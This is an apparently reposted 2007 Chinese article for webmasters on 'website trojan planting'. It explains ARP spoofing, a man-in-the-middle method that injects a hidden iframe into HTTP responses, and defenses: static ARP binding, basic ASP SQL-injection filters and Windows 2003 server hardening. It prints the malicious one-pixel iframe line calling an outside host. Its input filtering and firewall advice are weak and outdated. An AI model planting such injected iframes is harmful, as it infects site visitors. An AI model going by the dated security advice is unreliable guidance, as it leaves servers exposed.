今天下午14:00,专家在线解决网站挂马难题

网站被挂马现象越来越严重,今天下午14:00,专家在线解决网站挂马难题  请站长们提前加群听课,先加先占位,请大家保持在线状态。谢谢合作。群号:3968171

什么是ARP

地址解析协议(Address Resolution Protocol,ARP)是在仅知道主机的IP地址时确定其物理地址的一种协议。因IPv4和以太网的广泛应用,其主要用作将IP地址翻译为以太网的MAC地址,但其也能在ATM和FDDIIP网络中使用。从IP地址到物理地址的映射有两种方式:表格方式和非表格方式。ARP具体说来就是将网络层(IP层,也就是相当于OSI的第三层)地址解析为数据连接层(MAC层,也就是相当于OSI的第二层)的MAC地址。

假设:
   计算机A的IP为192.168.1.1,MAC地址为00-11-22-33-44-01;
   计算机B的IP为192.168.1.2,MAC地址为00-11-22-33-44-02;

ARP工作原理如下:

在TCP/IP协议中,A给B发送IP包,在包头中需要填写B的IP为目标地址,但这个IP包在以太网上传输的时候,还需要进行一次以太包的封装,在这个以太包中,目标地址就是B的MAC地址.

计算机A是如何得知B的MAC地址的呢?解决问题的关键就在于ARP协议。

在A不知道B的MAC地址的情况下,A就广播一个ARP请求包,请求包中填有B的IP(192.168.1.2),以太网中的所有计算机都会接收这个请求,而正常的情况下只有B会给出ARP应答包,包中就填充上了B的MAC地址,并回复给A。

A得到ARP应答后,将B的MAC地址放入本机缓存,便于下次使用。

本机MAC缓存是有生存期的,生存期结束后,将再次重复上面的过程。

ARP协议并不只在发送了ARP请求才接收ARP应答。当计算机接收到ARP应答数据包的时候,就会对本地的ARP缓存进行更新,将应答中的IP和MAC地址存储在ARP缓存中。因此,当局域网中的某台机器B向A发送一个自己伪造的ARP应答,而如果这个应答是B冒充C伪造来的,即IP地址为C的IP,而MAC地址是伪造的,则当A接收到B伪造的ARP应答后,就会更新本地的ARP缓存,这样在A看来C的IP地址没有变,而它的MAC地址已经不是原来那个了。由于局域网的网络流通不是根据IP地址进行,而是按照MAC地址进行传输。所以,那个伪造出来的MAC地址在A上被改变成一个不存在的MAC地址,这样就会造成网络不通,导致A不能Ping通C!这就是一个简单的ARP欺骗。

应用

在网络执法官中,要想限制某台机器上网,只要点击"网卡"菜单中的"权限",选择指定的网卡号或在用户列表中点击该网卡所在行,从右键菜单中选择"权限",在弹出的对话框中即可限制该用户的权限。对于未登记网卡,可以这样限定其上线:只要设定好所有已知用户(登记)后,将网卡的默认权限改为禁止上线即可阻止所有未知的网卡上线。使用这两个功能就可限制用户上网。其原理是通过ARP欺骗发给被攻击的电脑一个假的网关IP地址对应的MAC,使其找不到网关真正的MAC地址,这样就可以禁止其上网。

防御
   ARP欺骗可以导致目标计算机与网关通信失败

更可怕的是会导致通信重定向,所有的数据都会通过攻击者的机器,因此存在极大的安全隐患。

基与PC到PC的IP-MAC双向绑定可以解决ARP欺骗

但是对于不支持IP-MAC双向绑定的设备

就需要用可以绑定端口-MAC的交换来预防ARP欺骗

另外,Windows 2KSP4 XPSP1 的Arp-S绑定是无效的

需要升级到 2KSP5 或 XPSP2

网页挂马原理

不管是访问服务器上的任何网页,就连404的页面也会在<html>后加入:

<IFRAME SRC=http://www.aaaa.com/a.htm width =1 height=1 frameborder=0></IFRAME>;,挂马的位置在html标记左右,上面这段恶意代码,它会每隔几秒加入代码,也就是说在输出具体的东西之前就被挂了,有时有有时又没有,不是网页源代码问题,也没有在网页源代码中加入恶意代码,即使重装服务器,格式化重分区过第一个硬盘,放上去网站没多久一样再会出现这种情况.

首先就排除了网站被入侵的可能,因为首页能加在那个位置只能是 title的地方,用js控制也不大可能.然后去看了php.ini的设置也没有任何的异常,而且这个插入的代码有的时候出现有的时候不出现,说明不是网站的问题了.打开同服务器的其他网站也有这个情况发生,而且状况一一样.检查并且搜索挂马的关键字之后确定不是网站程序的问题.

那么剩下的要么是IIS自己出了问题,要么是网络的问题,因为数据是处理没有问题(这个由程序输出,而且即使是html都会出问题),经过一个一个排查,最后基本可以确定就是arp欺骗欺骗数据报走向,然后中间人修改一些定义的关键字.因为是网络层次有问题(所以重做系统是没有用的).

目的:通过arp欺骗来直接挂马

优点:可以直接通过arp欺骗来挂马.

通常的arp欺骗的攻击方式是在同一vlan下,控制一台主机来监听密码,或者结合ssh中间人攻击来监听ssh1的密码
但这样存在局限性:1.管理员经常不登陆,那么要很久才能监听到密码
2.目标主机只开放了80端口,和一个管理端口,且80上只有静态页面,那么很难利用.而管理端口,如果是3389终端,或者是ssh2,那么非常难监听到密码.

优点:1.可以不用获得目标主机的权限就可以直接在上面挂马
2.非常隐蔽,不改动任何目标主机的页面或者是配置,在网络传输的过程中间直接插入挂马的语句.
3.可以最大化的利用arp欺骗,从而只要获取一台同一vlan下主机的控制权,就可以最大化战果.

原理:arp中间人攻击,实际上相当于做了一次代理。

正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A---->C---->B         B---->C---->A

实际上,C在这里做了一次代理的作用

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如 <iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了.

防御专题

最简单的办法就一命令OK,实现与网关绑定,比如网关是 192.168.0.1 比如网关MAC 00-00-00-00-00,好了我们直接用记事本保存代码为 arp -s 192.168.0.1 00-00-00-00-00 然后保存,改拓展名为bat 加入到服务器启动项,目前ARP攻击猖獗,ARP的目前为一的完美解决方案就是实现 本机与网关的双向绑定。所谓ARP防火墙,只是起到暂时保护的作用,以上方法可以有效的防止服务器被人ARP挂马

SQL漏洞专题

简单一点:

对于int型的参数,如文章的id等,可以先判断是不是整数。

id =trim(request("id"))
if id<>"" then
if Not isNumeric(id) then
response.write"请提供数字型参数"
response.end
end if
id = clng(id)
else
response.write"请输入参数id"
response.end
end if

这样的话,明小子系列就无法注入了。

也可以控制 "'"号输入就行了,再控制一些 SQL 关键字的这样更安全

比如

id=trim(request("id"))

if instr(id,"'")>0 or instr(id,"insert")>0 then
response.write "对不起,请不要注入本站"
response.end
end if

提醒大家,SQL只要打完必补丁,最重要的是,千万别设置什么SA/123456 SA/123 SA/SA之类的弱口令,现在的小黑太多了,动不动就是全网段扫描1433弱口令,在次提醒大家,千万别设置弱口令。基本服务器就安全(小黑是进不来的,高手嘛,说不准了,反正高手也不会动你的东西)

服务器安全之后门篇

我们今天主要讲解2003服务器

最常见的问题,服务器一般都开3389 4899等,在次提醒大家,弱口令问题,现在什么小黑都有,千万别设置什么123 123456之类,修改3389 4899端口 建议停止微软的防火墙,直接在网上,开放需要的端口。系统补丁,我想不用说,肯定要打的。也可采用国外的一款软件 黑冰(号称世界排第三,本人以前用过,感觉也就那样,不过确实不错)

本地安全策略设置密码强度,然后删出系统默认管理员,修改管理组,别留什么adminisrators 呵呵,不允许建立帐户,嘿嘿,绝吧。
服务器杀毒软件必备!推荐使用麦咖啡。上次进了一批服务器,发现全是用麦咖啡(连联众的计费服务器,baidu的有一个服务器也是),设置OK基本百毒不侵(服务器好的建议使用,呵呵就可以防止什么鸽子啊,黑洞啊,红娘啊之类的东西装上了)。
在次说明请大家检查自己的服务器登陆3389界面,别输入密码,先按5次SHIFT,看看,如果弹出c盘,或cmd 或则一个密码窗口,呵呵恭喜你,你的服务器被人玩了,小弟可帮大家解决,这个后门被誉为windows最强悍后门。不需要密码验证,直接得到shell。
为了广大站长朋友,此文章无任何技术难度。

上邪  于2007年10月22日

时间: 2024-09-19 20:42:03

今天下午14:00,专家在线解决网站挂马难题的相关文章

知道创宇发布scanv网站挂马检测和评估系统

3月5日,全球IT企业巨头微软在中国的唯一安全服务提供商--北京知道创宇信息技术有限公司(www.knownsec.com )在北京全球同步发布了拥有自主知识产权的scanv网站挂马检测和评估系统,并且向中国地区所有网站免费开放.网站管理员和网民在scanv系统中输入网址,该系统即可自主检测网站的安全性,同时得到所检测网站的IP地址.曾使用的IP地址.域名.所在地.检测次数.挂马次数.安全次数.其他机构对该网站的安全评价等丰富信息,当检测到网站被挂马,系统可自动找到具体挂马类型及原因. scan

黑客借势开学攻击 高校网站挂马剧增

中介交易 SEO诊断 淘宝客 云主机 技术大厅 时值9月开学季,高校网站浏览量猛增,而学生群体又是网游和网购市场的主力军,黑客正是借势对高校网站发动针对性攻击.对此,专家建议广大新生访问高校网站时,使用360安全卫士及浏览器等具备上网防护功能的软件,可有效拦截网站挂马威胁. 随着学校陆续开学,网络黑客攻击重点开始转向高校网站.据360安全中心监测,近期edu.cn域名的高校网站挂马数量剧增,相比8月涨幅达到70%以上.专家表示,由于大学宿舍电脑在假期无法打补丁,很容易被木马趁虚而入,建议广大学生

国内连续发生多起高校网站挂马事件

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 近期,国家互联网应急中心(CNCERT)监测发现,国内连续发生多起高校网站挂马事件,涉及国内20余所院校,其中不乏一些知名的重点院校.6月初高考将至,各大高校网站将成为考生及相关互联网用户访问的热点,其网站挂马可能导致大量访问者的计算机被植入木马而受到黑客控制,进而造成用户重要数据被窃取.在线交易行为被偷窥等严重后果,大量计算机被控制也对互联

dedecms网站挂马后降权后如何快速恢复

  网站被黑在如今的网络时代已经是家常便饭的事情了,即便是dedecms这样具备强大功能和高度安全性的网站也难以幸免,如果在挂马后能够及时的删除相关黑链或病毒,可以逃过搜索引擎的惩罚,而一旦由于发现自己的收录数减少,关键词排名下降才恍然大悟,那么真的是悲剧了,说明网站已经被搜索引擎给降权了. 之前说dedecms具备强大的功能,因此在降权后恢复网站本身的权重甚至做的更好也是具有一定优势的.以下来说下本身的亲身经历,如何把自己的由于挂马被降权的dedecms网站快速恢复收录和关键词排名重新上升的.

教你如何简单有效地查找网站挂马文件

&http://www.aliyun.com/zixun/aggregation/37954.html">nbsp;   由安全公司Dasient编制的一份报告显示,大约64万个网站的580万个页面被恶意攻击代码感染. 而在四月份根据微软发表的数据,这个数字大约只有300万.Dasient联合创始人Ameet Ranadive表示,黑客利用攻击服务器的手段,可以轻松分发超大数量的恶意软件,并且网站管理员们也很难找出哪些部分被感染并找出漏洞防止下次挂马的发生. 据估计,54.8%的攻

Python实现的检测网站挂马程序_python

系统管理员通常从svn/git中检索代码,部署站点后通常首先会生成该站点所有文件的MD5值,如果上线后网站页面内容被篡改(如挂马)等,可以比对之前生成MD5值快速查找去那些文件被更改,为了使系统管理员第一时间发现,可结合crontab或nagios等工具. 程序测试如下: # python check_change.py Usage: python check_change.py update /home/wwwroot python check_change.py check /home/ww

绿盟科技发布2009年政府网站挂马监测研究报告

中介交易 SEO诊断 淘宝客 云主机 技术大厅 日前,"2009中国政府网站绩效评估与第四届中国特色政府网站评选结果发布大会"在北京梅地亚中心举行.会上,绿盟科技首次披露<2009年政府网站挂马监测研究报告>部分数据,报告显示,政府网站安全形势依然严峻,目前我国政府网站绩效评估体系设计上存在安全指标的缺失,并没有考虑到网站安全问题给政府形象.政务网站业务运行带来的潜在风险与隐患.针对此情况,绿盟科技政府行业营销总监孙铁详细讲解了政府网站整体安全保障解决方案,并介绍了web安

书生教你如何快速找出网站挂马的文件

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 昨天书生的IT学院站又给挂马了.这可真够郁闷的,因为是又一次给挂马,不是第一次了.因为昨天晚上有朋友向我反应,打开IT学院站时,浏览器提示有木马.我赶紧去盘查,找杀木马.不过也非常感谢站在第一线上一直给别人网站挂马的垃圾人,正因为你一而再再而三的给我的网站挂马,让我找到了一个非常容易的找出木马所在位置的方法.这种方法简单有效,不敢独享,所以写

网站挂马的处理办法

做网站已经快3年了,第一次遭遇挂马.可以说是很刺激,但这种刺激似乎不太友好. 新建的网站上线已经4个月了,一直运行正常,访问速度也很快.直至前三天的下午,一个http://www.aliyun.com/zixun/aggregation/3640.html">网友加了我网站上的联系QQ,上来就一顿大骂,说我网站竟然放病毒,害的他电脑死机.重启,最后连重启都重启不了了.我当时懵了,还真是不知道怎么回事,就被这劈头盖脸的臭骂一番.我很冷静的回复了他一句:"朋友,我的网站哪个页面有毒?